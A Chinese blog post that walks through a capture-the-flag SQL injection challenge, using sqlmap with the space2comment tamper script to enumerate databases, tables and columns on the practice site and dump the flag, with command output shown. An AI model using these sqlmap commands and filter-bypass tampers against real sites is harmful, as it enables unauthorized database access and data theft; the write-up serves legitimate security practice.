Sqlmap初學 實驗吧 簡單的SQL 注入二

http://ctf5.shiyanbar.com/web/index_2.php

一開始我們簡單的來一下輸入 1'

提示 語法錯誤 但并沒有過濾 '?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to usenear ''1''' at line

過濾了空格

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper space2comment --dbs


得到結果

available databases [3]:

[*] information_schema

[*] test

[*] web1


很明顯藕夫。。這是跟第一題一樣樣的

next

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper space2comment -D web1 --table


結果如下

Database: web1

[2 tables]

+-------+

| flag? |

| web_1 |

+-------+


next?

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper space2comment -D web1 -T flag --columns


Database: web1

Table: flag

[2 columns]

+--------+----------+

| Column | Type? ? |

+--------+----------+

| flag? | char(30) |

| id? ? | int(4)? |


我們指定顯示flag的字段內容

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper space2comment -D web1 -T flag -C flag --dump

Database: web1

Table: flag

[1 entry]

+----------------------------+

| flag? ? ? ? ? ? ? ? ? ? ? |

+----------------------------+

| flag{Y0u_@r3_5O_dAmn_90Od} |

+----------------------------+


總結

在這里面用到的方法內容都差不多

只要多用tamper的腳本多嘗試就可以了

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末玉控,一起剝皮案震驚了整個濱河市敦跌,隨后出現(xiàn)的幾起案子铲汪,更是在濱河造成了極大的恐慌叛溢,老刑警劉巖葵诈,帶你破解...
    沈念sama閱讀 218,036評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件裸弦,死亡現(xiàn)場離奇詭異,居然都是意外死亡作喘,警方通過查閱死者的電腦和手機理疙,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,046評論 3 395
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來泞坦,“玉大人窖贤,你說我怎么就攤上這事》∷” “怎么了赃梧?”我有些...
    開封第一講書人閱讀 164,411評論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長豌熄。 經常有香客問我授嘀,道長,這世上最難降的妖魔是什么锣险? 我笑而不...
    開封第一講書人閱讀 58,622評論 1 293
  • 正文 為了忘掉前任蹄皱,我火速辦了婚禮览闰,結果婚禮上,老公的妹妹穿的比我還像新娘巷折。我一直安慰自己压鉴,他們只是感情好,可當我...
    茶點故事閱讀 67,661評論 6 392
  • 文/花漫 我一把揭開白布盔几。 她就那樣靜靜地躺著晴弃,像睡著了一般。 火紅的嫁衣襯著肌膚如雪逊拍。 梳的紋絲不亂的頭發(fā)上上鞠,一...
    開封第一講書人閱讀 51,521評論 1 304
  • 那天,我揣著相機與錄音芯丧,去河邊找鬼芍阎。 笑死,一個胖子當著我的面吹牛缨恒,可吹牛的內容都是我干的谴咸。 我是一名探鬼主播,決...
    沈念sama閱讀 40,288評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼骗露,長吁一口氣:“原來是場噩夢啊……” “哼岭佳!你這毒婦竟也來了?” 一聲冷哼從身側響起萧锉,我...
    開封第一講書人閱讀 39,200評論 0 276
  • 序言:老撾萬榮一對情侶失蹤珊随,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后柿隙,有當地人在樹林里發(fā)現(xiàn)了一具尸體叶洞,經...
    沈念sama閱讀 45,644評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,837評論 3 336
  • 正文 我和宋清朗相戀三年禀崖,在試婚紗的時候發(fā)現(xiàn)自己被綠了衩辟。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,953評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡波附,死狀恐怖艺晴,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情叶雹,我是刑警寧澤财饥,帶...
    沈念sama閱讀 35,673評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站折晦,受9級特大地震影響钥星,放射性物質發(fā)生泄漏。R本人自食惡果不足惜满着,卻給世界環(huán)境...
    茶點故事閱讀 41,281評論 3 329
  • 文/蒙蒙 一谦炒、第九天 我趴在偏房一處隱蔽的房頂上張望贯莺。 院中可真熱鬧,春花似錦宁改、人聲如沸缕探。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,889評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽爹耗。三九已至,卻和暖如春谜喊,著一層夾襖步出監(jiān)牢的瞬間潭兽,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,011評論 1 269
  • 我被黑心中介騙來泰國打工斗遏, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留山卦,地道東北人。 一個月前我還...
    沈念sama閱讀 48,119評論 3 370
  • 正文 我出身青樓诵次,卻偏偏與公主長得像账蓉,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子逾一,可洞房花燭夜當晚...
    茶點故事閱讀 44,901評論 2 355

推薦閱讀更多精彩內容